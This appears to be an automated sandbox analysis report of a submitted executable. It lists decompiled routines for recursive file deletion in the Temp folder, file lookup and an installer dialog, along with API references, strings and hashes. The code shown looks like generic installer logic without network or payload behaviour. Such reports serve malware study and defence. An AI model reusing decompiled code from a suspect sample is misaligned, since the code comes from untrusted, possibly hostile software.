                                                                                                                        • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                                                                        				signed int _v8;
                                                                                                                        				signed int _v12;
                                                                                                                        				struct _WIN32_FIND_DATAA _v332;
                                                                                                                        				signed int _t37;
                                                                                                                        				void* _t38;
                                                                                                                        				char* _t46;
                                                                                                                        				signed int _t49;
                                                                                                                        				signed int _t52;
                                                                                                                        				signed int _t58;
                                                                                                                        				signed int _t59;
                                                                                                                        				void* _t61;
                                                                                                                        				signed int _t64;
                                                                                                                        				void* _t66;
                                                                                                                        				CHAR* _t68;
                                                                                                                        				char* _t71;
                                                                                                                        
                                                                                                                        				_t68 = _a4;
                                                                                                                        				_t37 = E0040573A(__eflags, _t68);
                                                                                                                        				_v12 = _t37;
                                                                                                                        				if((_a8 & 0x00000008) != 0) {
                                                                                                                        					_t59 = DeleteFileA(_t68);
                                                                                                                        					asm("sbb eax, eax");
                                                                                                                        					_t61 =  ~_t59 + 1;
                                                                                                                        					 *0x423f28 =  *0x423f28 + _t61;
                                                                                                                        					return _t61;
                                                                                                                        				}
                                                                                                                        				_t64 = _a8 & 0x00000001;
                                                                                                                        				__eflags = _t64;
                                                                                                                        				_v8 = _t64;
                                                                                                                        				if(_t64 == 0) {
                                                                                                                        					L5:
                                                                                                                        					_t38 = E00405B66(0x4214a8, _t68);
                                                                                                                        					__eflags = _t64;
                                                                                                                        					if(_t64 == 0) {
                                                                                                                        						_t38 = E004056A0(_t38, _t68);
                                                                                                                        					} else {
                                                                                                                        						_push("\*.*");
                                                                                                                        						_push(0x4214a8);
                                                                                                                        						L00405B82();
                                                                                                                        					}
                                                                                                                        					__eflags =  *_t68;
                                                                                                                        					if( *_t68 != 0) {
                                                                                                                        						L10:
                                                                                                                        						_push(0x409010);
                                                                                                                        						_push(_t68);
                                                                                                                        						L00405B82();
                                                                                                                        						L11:
                                                                                                                        						_push(_t68);
                                                                                                                        						L00405B7C();
                                                                                                                        						_t66 = _t38 + _t68;
                                                                                                                        						_t37 = FindFirstFileA(0x4214a8,  &_v332);
                                                                                                                        						__eflags = _t37 - 0xffffffff;
                                                                                                                        						_a4 = _t37;
                                                                                                                        						if(_t37 == 0xffffffff) {
                                                                                                                        							L29:
                                                                                                                        							__eflags = _v8;
                                                                                                                        							if(_v8 != 0) {
                                                                                                                        								_t31 = _t66 - 1;
                                                                                                                        								 *_t31 =  *(_t66 - 1) & 0x00000000;
                                                                                                                        								__eflags =  *_t31;
                                                                                                                        							}
                                                                                                                        							goto L31;
                                                                                                                        						} else {
                                                                                                                        							goto L12;
                                                                                                                        						}
                                                                                                                        						do {
                                                                                                                        							L12:
                                                                                                                        							_t71 =  &(_v332.cFileName);
                                                                                                                        							_t46 = E00405684( &(_v332.cFileName), 0x3f);
                                                                                                                        							__eflags =  *_t46;
                                                                                                                        							if( *_t46 != 0) {
                                                                                                                        								__eflags = _v332.cAlternateFileName;
                                                                                                                        								if(_v332.cAlternateFileName != 0) {
                                                                                                                        									_t71 =  &(_v332.cAlternateFileName);
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							__eflags =  *_t71 - 0x2e;
                                                                                                                        							if( *_t71 != 0x2e) {
                                                                                                                        								L19:
                                                                                                                        								E00405B66(_t66, _t71);
                                                                                                                        								__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                                                                        								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                        									E0040581E(_t68);
                                                                                                                        									_t49 = DeleteFileA(_t68);
                                                                                                                        									__eflags = _t49;
                                                                                                                        									if(_t49 != 0) {
                                                                                                                        										E00404F04(0xfffffff2, _t68);
                                                                                                                        									} else {
                                                                                                                        										__eflags = _a8 & 0x00000004;
                                                                                                                        										if((_a8 & 0x00000004) == 0) {
                                                                                                                        											 *0x423f28 =  *0x423f28 + 1;
                                                                                                                        										} else {
                                                                                                                        											E00404F04(0xfffffff1, _t68);
                                                                                                                        											_push(0);
                                                                                                                        											_push(_t68);
                                                                                                                        											E004058B4();
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                        									if(__eflags == 0) {
                                                                                                                        										E0040548B(_t66, __eflags, _t68, _a8);
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								goto L27;
                                                                                                                        							}
                                                                                                                        							_t58 =  *((intOrPtr*)(_t71 + 1));
                                                                                                                        							__eflags = _t58;
                                                                                                                        							if(_t58 == 0) {
                                                                                                                        								goto L27;
                                                                                                                        							}
                                                                                                                        							__eflags = _t58 - 0x2e;
                                                                                                                        							if(_t58 != 0x2e) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							__eflags =  *((char*)(_t71 + 2));
                                                                                                                        							if( *((char*)(_t71 + 2)) == 0) {
                                                                                                                        								goto L27;
                                                                                                                        							}
                                                                                                                        							goto L19;
                                                                                                                        							L27:
                                                                                                                        							_t52 = FindNextFileA(_a4,  &_v332);
                                                                                                                        							__eflags = _t52;
                                                                                                                        						} while (_t52 != 0);
                                                                                                                        						_t37 = FindClose(_a4);
                                                                                                                        						goto L29;
                                                                                                                        					}
                                                                                                                        					__eflags =  *0x4214a8 - 0x5c;
                                                                                                                        					if( *0x4214a8 != 0x5c) {
                                                                                                                        						goto L11;
                                                                                                                        					}
                                                                                                                        					goto L10;
                                                                                                                        				} else {
                                                                                                                        					__eflags = _t37;
                                                                                                                        					if(_t37 == 0) {
                                                                                                                        						L31:
                                                                                                                        						__eflags = _v8;
                                                                                                                        						if(_v8 == 0) {
                                                                                                                        							L39:
                                                                                                                        							return _t37;
                                                                                                                        						}
                                                                                                                        						__eflags = _v12;
                                                                                                                        						if(_v12 != 0) {
                                                                                                                        							_t37 = E00405E61(_t68);
                                                                                                                        							__eflags = _t37;
                                                                                                                        							if(_t37 == 0) {
                                                                                                                        								goto L39;
                                                                                                                        							}
                                                                                                                        							E00405659(_t37, _t68);
                                                                                                                        							E0040581E(_t68);
                                                                                                                        							_t37 = RemoveDirectoryA(_t68);
                                                                                                                        							__eflags = _t37;
                                                                                                                        							if(_t37 != 0) {
                                                                                                                        								return E00404F04(0xffffffe5, _t68);
                                                                                                                        							}
                                                                                                                        							__eflags = _a8 & 0x00000004;
                                                                                                                        							if((_a8 & 0x00000004) == 0) {
                                                                                                                        								goto L33;
                                                                                                                        							}
                                                                                                                        							E00404F04(0xfffffff1, _t68);
                                                                                                                        							_push(0);
                                                                                                                        							_push(_t68);
                                                                                                                        							return E004058B4();
                                                                                                                        						}
                                                                                                                        						L33:
                                                                                                                        						 *0x423f28 =  *0x423f28 + 1;
                                                                                                                        						return _t37;
                                                                                                                        					}
                                                                                                                        					__eflags = _a8 & 0x00000002;
                                                                                                                        					if((_a8 & 0x00000002) == 0) {
                                                                                                                        						goto L31;
                                                                                                                        					}
                                                                                                                        					goto L5;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        0x004055ab
                                                                                                                        0x004055ab
                                                                                                                        0x004055af
                                                                                                                        0x004055c3
                                                                                                                        0x004055b1
                                                                                                                        0x004055b4
                                                                                                                        0x004055b9
                                                                                                                        0x004055bb
                                                                                                                        0x004055bc
                                                                                                                        0x004055bc
                                                                                                                        0x004055af
                                                                                                                        0x00405585
                                                                                                                        0x0040558b
                                                                                                                        0x0040558d
                                                                                                                        0x00405593
                                                                                                                        0x00405593
                                                                                                                        0x0040558d
                                                                                                                        0x00000000
                                                                                                                        0x00405583
                                                                                                                        0x00405564
                                                                                                                        0x00405567
                                                                                                                        0x00405569
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040556b
                                                                                                                        0x0040556d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040556f
                                                                                                                        0x00405573
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004055d3
                                                                                                                        0x004055dd
                                                                                                                        0x004055e3
                                                                                                                        0x004055e3
                                                                                                                        0x004055ee
                                                                                                                        0x00000000
                                                                                                                        0x004055ee
                                                                                                                        0x00405505
                                                                                                                        0x0040550c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004054cb
                                                                                                                        0x004054cb
                                                                                                                        0x004054cd
                                                                                                                        0x004055fe
                                                                                                                        0x00405601
                                                                                                                        0x00405604
                                                                                                                        0x00405656
                                                                                                                        0x00405656
                                                                                                                        0x00405656
                                                                                                                        0x00405606
                                                                                                                        0x00405609
                                                                                                                        0x00405614
                                                                                                                        0x00405619
                                                                                                                        0x0040561b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040561e
                                                                                                                        0x00405624
                                                                                                                        0x0040562a
                                                                                                                        0x00405630
                                                                                                                        0x00405632
                                                                                                                        0x00000000
                                                                                                                        0x0040564e
                                                                                                                        0x00405634
                                                                                                                        0x00405638
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040563d
                                                                                                                        0x00405642
                                                                                                                        0x00405643
                                                                                                                        0x00000000
                                                                                                                        0x00405644
                                                                                                                        0x0040560b
                                                                                                                        0x0040560b
                                                                                                                        0x00000000
                                                                                                                        0x0040560b
                                                                                                                        0x004054d3
                                                                                                                        0x004054d7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004054d7

                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 004054A9
                                                                                                                        • lstrcat.KERNEL32(004214A8,\*.*), ref: 004054F3
                                                                                                                        • lstrcat.KERNEL32(?,00409010), ref: 00405514
                                                                                                                        • lstrlen.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 0040551A
                                                                                                                        • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 0040552B
                                                                                                                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                                                        • FindClose.KERNEL32(?), ref: 004055EE
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                                                        • "C:\Users\user\Desktop\77Etc0bR2v.exe" , xrefs: 00405495
                                                                                                                        • \*.*, xrefs: 004054ED
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\77Etc0bR2v.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                        • API String ID: 2035342205-3636182036
                                                                                                                        • Opcode ID: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                                        • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                                                        • Opcode Fuzzy Hash: 7a19b7ea85d0f8bff8962d5b7d174e9fed4053393f49275f79294cdc09bf412a
                                                                                                                        • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405E61(CHAR* _a4) {
                                                                                                                        				void* _t2;
                                                                                                                        
                                                                                                                        				_t2 = FindFirstFileA(_a4, 0x4224f0);
                                                                                                                        				if(_t2 == 0xffffffff) {
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				FindClose(_t2);
                                                                                                                        				return 0x4224f0;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(?,004224F0,004218A8,0040577D,004218A8,004218A8,00000000,004218A8,004218A8,?,?,747DF560,0040549F,?,"C:\Users\user\Desktop\77Etc0bR2v.exe" ,747DF560), ref: 00405E6C
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405E78
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                        • Instruction ID: f2fe444ddfa45285d6a9eb51d657c4c39712a0d2250b7f8498e11f87d01b5aa3
                                                                                                                        • Opcode Fuzzy Hash: a0d9290738f1f02d4b3743de2211279f78b4a64d0718c2c828088997ee3199ab
                                                                                                                        • Instruction Fuzzy Hash: 26D012359495206FC7001738AD0C85B7A58EF553347508B32F969F62E0C7B4AD51DAED
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 39%
                                                                                                                        			E0040263E(char __ebx, char* __edi, char* __esi) {
                                                                                                                        				void* _t19;
                                                                                                                        
                                                                                                                        				if(FindFirstFileA(E004029F6(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                                                                        					E00405AC4(__edi, _t6);
                                                                                                                        					_push(_t19 - 0x178);
                                                                                                                        					_push(__esi);
                                                                                                                        					E00405B66();
                                                                                                                        				} else {
                                                                                                                        					 *__edi = __ebx;
                                                                                                                        					 *__esi = __ebx;
                                                                                                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                                                        				}
                                                                                                                        				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                        				return 0;
                                                                                                                        			}





                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040264D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindFirst
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 76%
                                                                                                                        			E00403A45(struct HWND__* _a4, struct HWND__* _a8, int _a12, long _a16) {
                                                                                                                        				struct HWND__* _v32;
                                                                                                                        				void* _v92;
                                                                                                                        				void* _v96;
                                                                                                                        				void* __ebx;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				signed int _t35;
                                                                                                                        				signed int _t37;
                                                                                                                        				signed int _t39;
                                                                                                                        				struct HWND__* _t49;
                                                                                                                        				void* _t62;
                                                                                                                        				signed int _t66;
                                                                                                                        				struct HWND__* _t72;
                                                                                                                        				signed int _t85;
                                                                                                                        				struct HWND__* _t90;
                                                                                                                        				signed int _t98;
                                                                                                                        				int _t102;
                                                                                                                        				signed int _t114;
                                                                                                                        				signed int _t115;
                                                                                                                        				int _t116;
                                                                                                                        				signed int _t121;
                                                                                                                        				struct HWND__* _t124;
                                                                                                                        				struct HWND__* _t125;
                                                                                                                        				int _t126;
                                                                                                                        				long _t129;
                                                                                                                        				int _t131;
                                                                                                                        				int _t132;
                                                                                                                        				void* _t133;
                                                                                                                        
                                                                                                                        				_t114 = _a8;
                                                                                                                        				if(_t114 == 0x110 || _t114 == 0x408) {
                                                                                                                        					_t35 = _a12;
                                                                                                                        					_t124 = _a4;
                                                                                                                        					__eflags = _t114 - 0x110;
                                                                                                                        					 *0x420484 = _t35;
                                                                                                                        					if(_t114 == 0x110) {
                                                                                                                        						 *0x423ea8 = _t124;
                                                                                                                        						 *0x420498 = GetDlgItem(_t124, 1);
                                                                                                                        						_t90 = GetDlgItem(_t124, 2);
                                                                                                                        						_push(0xffffffff);
                                                                                                                        						_push(0x1c);
                                                                                                                        						 *0x41f460 = _t90;
                                                                                                                        						E00403F18(_t124);
                                                                                                                        						SetClassLongA(_t124, 0xfffffff2,  *0x423688);
                                                                                                                        						 *0x42366c = E0040140B(4);
                                                                                                                        						_t35 = 1;
                                                                                                                        						__eflags = 1;
                                                                                                                        						 *0x420484 = 1;
                                                                                                                        					}
                                                                                                                        					_t121 =  *0x4091c4; // 0xffffffff
                                                                                                                        					_t132 = 0;
                                                                                                                        					_t129 = (_t121 << 6) +  *0x423ec0;
                                                                                                                        					__eflags = _t121;
                                                                                                                        					if(_t121 < 0) {
                                                                                                                        						L34:
                                                                                                                        						E00403F64(0x40b);
                                                                                                                        						while(1) {
                                                                                                                        							_t37 =  *0x420484;
                                                                                                                        							 *0x4091c4 =  *0x4091c4 + _t37;
                                                                                                                        							_t129 = _t129 + (_t37 << 6);
                                                                                                                        							_t39 =  *0x4091c4; // 0xffffffff
                                                                                                                        							__eflags = _t39 -  *0x423ec4;
                                                                                                                        							if(_t39 ==  *0x423ec4) {
                                                                                                                        								E0040140B(1);
                                                                                                                        							}
                                                                                                                        							__eflags =  *0x42366c - _t132;
                                                                                                                        							if( *0x42366c != _t132) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							__eflags =  *0x4091c4 -  *0x423ec4; // 0xffffffff
                                                                                                                        							if(__eflags >= 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t115 =  *(_t129 + 0x14);
                                                                                                                        							E00405B88(_t115, _t124, _t129, 0x42b800,  *((intOrPtr*)(_t129 + 0x24)));
                                                                                                                        							_push( *((intOrPtr*)(_t129 + 0x20)));
                                                                                                                        							_push(0xfffffc19);
                                                                                                                        							E00403F18(_t124);
                                                                                                                        							_push( *((intOrPtr*)(_t129 + 0x1c)));
                                                                                                                        							_push(0xfffffc1b);
                                                                                                                        							E00403F18(_t124);
                                                                                                                        							_push( *((intOrPtr*)(_t129 + 0x28)));
                                                                                                                        							_push(0xfffffc1a);
                                                                                                                        							E00403F18(_t124);
                                                                                                                        							_t49 = GetDlgItem(_t124, 3);
                                                                                                                        							__eflags =  *0x423f2c - _t132;
                                                                                                                        							_v32 = _t49;
                                                                                                                        							if( *0x423f2c != _t132) {
                                                                                                                        								_t115 = _t115 & 0x0000fefd | 0x00000004;
                                                                                                                        								__eflags = _t115;
                                                                                                                        							}
                                                                                                                        							ShowWindow(_t49, _t115 & 0x00000008);
                                                                                                                        							EnableWindow( *(_t133 + 0x30), _t115 & 0x00000100);
                                                                                                                        							E00403F3A(_t115 & 0x00000002);
                                                                                                                        							_t116 = _t115 & 0x00000004;
                                                                                                                        							EnableWindow( *0x41f460, _t116);
                                                                                                                        							__eflags = _t116 - _t132;
                                                                                                                        							if(_t116 == _t132) {
                                                                                                                        								_push(1);
                                                                                                                        							} else {
                                                                                                                        								_push(_t132);
                                                                                                                        							}
                                                                                                                        							EnableMenuItem(GetSystemMenu(_t124, _t132), 0xf060, ??);
                                                                                                                        							SendMessageA( *(_t133 + 0x38), 0xf4, _t132, 1);
                                                                                                                        							__eflags =  *0x423f2c - _t132;
                                                                                                                        							if( *0x423f2c == _t132) {
                                                                                                                        								_push( *0x420498);
                                                                                                                        							} else {
                                                                                                                        								SendMessageA(_t124, 0x401, 2, _t132);
                                                                                                                        								_push( *0x41f460);
                                                                                                                        							}
                                                                                                                        							E00403F4D();
                                                                                                                        							_t62 = E00405B66(0x4204a0, 0x4236a0);
                                                                                                                        							_push( *((intOrPtr*)(_t129 + 0x18)));
                                                                                                                        							L00405B7C();
                                                                                                                        							E00405B88(0x4204a0, _t124, _t129, _t62 + 0x4204a0, 0x4204a0);
                                                                                                                        							SetWindowTextA(_t124, 0x4204a0);
                                                                                                                        							_push(_t132);
                                                                                                                        							_t66 = E00401389( *((intOrPtr*)(_t129 + 8)));
                                                                                                                        							__eflags = _t66;
                                                                                                                        							if(_t66 != 0) {
                                                                                                                        								continue;
                                                                                                                        							} else {
                                                                                                                        								__eflags =  *_t129 - _t132;
                                                                                                                        								if( *_t129 == _t132) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								__eflags =  *(_t129 + 4) - 5;
                                                                                                                        								if( *(_t129 + 4) != 5) {
                                                                                                                        									 *0x4071e8( *0x423678);
                                                                                                                        									 *0x41fc70 = _t129;
                                                                                                                        									__eflags =  *_t129 - _t132;
                                                                                                                        									if( *_t129 <= _t132) {
                                                                                                                        										goto L58;
                                                                                                                        									}
                                                                                                                        									_t72 = CreateDialogParamA( *0x423ea0,  *_t129 +  *0x423680 & 0x0000ffff, _t124,  *(0x4091c8 +  *(_t129 + 4) * 4), _t129);
                                                                                                                        									__eflags = _t72 - _t132;
                                                                                                                        									 *0x423678 = _t72;
                                                                                                                        									if(_t72 == _t132) {
                                                                                                                        										goto L58;
                                                                                                                        									}
                                                                                                                        									_push( *((intOrPtr*)(_t129 + 0x2c)));
                                                                                                                        									_push(6);
                                                                                                                        									E00403F18(_t72);
                                                                                                                        									GetWindowRect(GetDlgItem(_t124, 0x3fa), _t133 + 0x10);
                                                                                                                        									ScreenToClient(_t124, _t133 + 0x10);
                                                                                                                        									SetWindowPos( *0x423678, _t132,  *(_t133 + 0x20),  *(_t133 + 0x20), _t132, _t132, 0x15);
                                                                                                                        									_push(_t132);
                                                                                                                        									E00401389( *((intOrPtr*)(_t129 + 0xc)));
                                                                                                                        									__eflags =  *0x42366c - _t132;
                                                                                                                        									if( *0x42366c != _t132) {
                                                                                                                        										goto L61;
                                                                                                                        									}
                                                                                                                        									ShowWindow( *0x423678, 8);
                                                                                                                        									E00403F64(0x405);
                                                                                                                        									goto L58;
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x423f2c - _t132;
                                                                                                                        								if( *0x423f2c != _t132) {
                                                                                                                        									goto L61;
                                                                                                                        								}
                                                                                                                        								__eflags =  *0x423f20 - _t132;
                                                                                                                        								if( *0x423f20 != _t132) {
                                                                                                                        									continue;
                                                                                                                        								}
                                                                                                                        								goto L61;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						 *0x4071e8( *0x423678);
                                                                                                                        						 *0x423ea8 = _t132;
                                                                                                                        						EndDialog(_t124,  *0x41f868);
                                                                                                                        						goto L58;
                                                                                                                        					} else {
                                                                                                                        						__eflags = _t35 - 1;
                                                                                                                        						if(_t35 != 1) {
                                                                                                                        							L33:
                                                                                                                        							__eflags =  *_t129 - _t132;
                                                                                                                        							if( *_t129 == _t132) {
                                                                                                                        								goto L61;
                                                                                                                        							}
                                                                                                                        							goto L34;
                                                                                                                        						}
                                                                                                                        						_push(0);
                                                                                                                        						_t85 = E00401389( *((intOrPtr*)(_t129 + 0x10)));
                                                                                                                        						__eflags = _t85;
                                                                                                                        						if(_t85 == 0) {
                                                                                                                        							goto L33;
                                                                                                                        						}
                                                                                                                        						SendMessageA( *0x423678, 0x40f, 0, 1);
                                                                                                                        						__eflags =  *0x42366c;
                                                                                                                        						return 0 |  *0x42366c == 0x00000000;
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t124 = _a4;
                                                                                                                        					_t132 = 0;
                                                                                                                        					if(_t114 == 0x47) {
                                                                                                                        						SetWindowPos( *0x420478, _t124, 0, 0, 0, 0, 0x13);
                                                                                                                        					}
                                                                                                                        					if(_t114 == 5) {
                                                                                                                        						asm("sbb eax, eax");
                                                                                                                        						ShowWindow( *0x420478,  ~(_a12 - 1) & _t114);
                                                                                                                        					}
                                                                                                                        					if(_t114 != 0x40d) {
                                                                                                                        						__eflags = _t114 - 0x11;
                                                                                                                        						if(_t114 != 0x11) {
                                                                                                                        							__eflags = _t114 - 0x111;
                                                                                                                        							if(_t114 != 0x111) {
                                                                                                                        								L26:
                                                                                                                        								return E00403F7F(_t114, _a12, _a16);
                                                                                                                        							}
                                                                                                                        							_t131 = _a12 & 0x0000ffff;
                                                                                                                        							_t125 = GetDlgItem(_t124, _t131);
                                                                                                                        							__eflags = _t125 - _t132;
                                                                                                                        							if(_t125 == _t132) {
                                                                                                                        								L13:
                                                                                                                        								__eflags = _t131 - 1;
                                                                                                                        								if(_t131 != 1) {
                                                                                                                        									__eflags = _t131 - 3;
                                                                                                                        									if(_t131 != 3) {
                                                                                                                        										_t126 = 2;
                                                                                                                        										__eflags = _t131 - _t126;
                                                                                                                        										if(_t131 != _t126) {
                                                                                                                        											L25:
                                                                                                                        											SendMessageA( *0x423678, 0x111, _a12, _a16);
                                                                                                                        											goto L26;
                                                                                                                        										}
                                                                                                                        										__eflags =  *0x423f2c - _t132;
                                                                                                                        										if( *0x423f2c == _t132) {
                                                                                                                        											_t98 = E0040140B(3);
                                                                                                                        											__eflags = _t98;
                                                                                                                        											if(_t98 != 0) {
                                                                                                                        												goto L26;
                                                                                                                        											}
                                                                                                                        											 *0x41f868 = 1;
                                                                                                                        											L21:
                                                                                                                        											_push(0x78);
                                                                                                                        											L22:
                                                                                                                        											E00403EF1();
                                                                                                                        											goto L26;
                                                                                                                        										}
                                                                                                                        										E0040140B(_t126);
                                                                                                                        										 *0x41f868 = _t126;
                                                                                                                        										goto L21;
                                                                                                                        									}
                                                                                                                        									__eflags =  *0x4091c4 - _t132; // 0xffffffff
                                                                                                                        									if(__eflags <= 0) {
                                                                                                                        										goto L25;
                                                                                                                        									}
                                                                                                                        									_push(0xffffffff);
                                                                                                                        									goto L22;
                                                                                                                        								}
                                                                                                                        								_push(_t131);
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        							SendMessageA(_t125, 0xf3, _t132, _t132);
                                                                                                                        							_t102 = IsWindowEnabled(_t125);
                                                                                                                        							__eflags = _t102;
                                                                                                                        							if(_t102 == 0) {
                                                                                                                        								goto L61;
                                                                                                                        							}
                                                                                                                        							goto L13;
                                                                                                                        						}
                                                                                                                        						SetWindowLongA(_t124, _t132, _t132);
                                                                                                                        						return 1;
                                                                                                                        					} else {
                                                                                                                        						 *0x4071e8( *0x423678);
                                                                                                                        						 *0x423678 = _a8;
                                                                                                                        						L58:
                                                                                                                        						if( *0x4214a0 == _t132 &&  *0x423678 != _t132) {
                                                                                                                        							ShowWindow(_t124, 0xa);
                                                                                                                        							 *0x4214a0 = 1;
                                                                                                                        						}
                                                                                                                        						L61:
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
                                                                                                                        0x00403b18
                                                                                                                        0x00403b1b
                                                                                                                        0x00403b20
                                                                                                                        0x00403b23
                                                                                                                        0x00403b33
                                                                                                                        0x00403b34
                                                                                                                        0x00403b36
                                                                                                                        0x00403b6c
                                                                                                                        0x00403b7f
                                                                                                                        0x00000000
                                                                                                                        0x00403b7f
                                                                                                                        0x00403b38
                                                                                                                        0x00403b3e
                                                                                                                        0x00403b57
                                                                                                                        0x00403b5c
                                                                                                                        0x00403b5e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403b60
                                                                                                                        0x00403b4c
                                                                                                                        0x00403b4c
                                                                                                                        0x00403b4e
                                                                                                                        0x00403b4e
                                                                                                                        0x00000000
                                                                                                                        0x00403b4e
                                                                                                                        0x00403b41
                                                                                                                        0x00403b46
                                                                                                                        0x00000000
                                                                                                                        0x00403b46
                                                                                                                        0x00403b25
                                                                                                                        0x00403b2b
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403b2d
                                                                                                                        0x00000000
                                                                                                                        0x00403b2d
                                                                                                                        0x00403b1d
                                                                                                                        0x00000000
                                                                                                                        0x00403b1d
                                                                                                                        0x00403b03
                                                                                                                        0x00403b0a
                                                                                                                        0x00403b10
                                                                                                                        0x00403b12
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403b12
                                                                                                                        0x00403ace
                                                                                                                        0x00000000
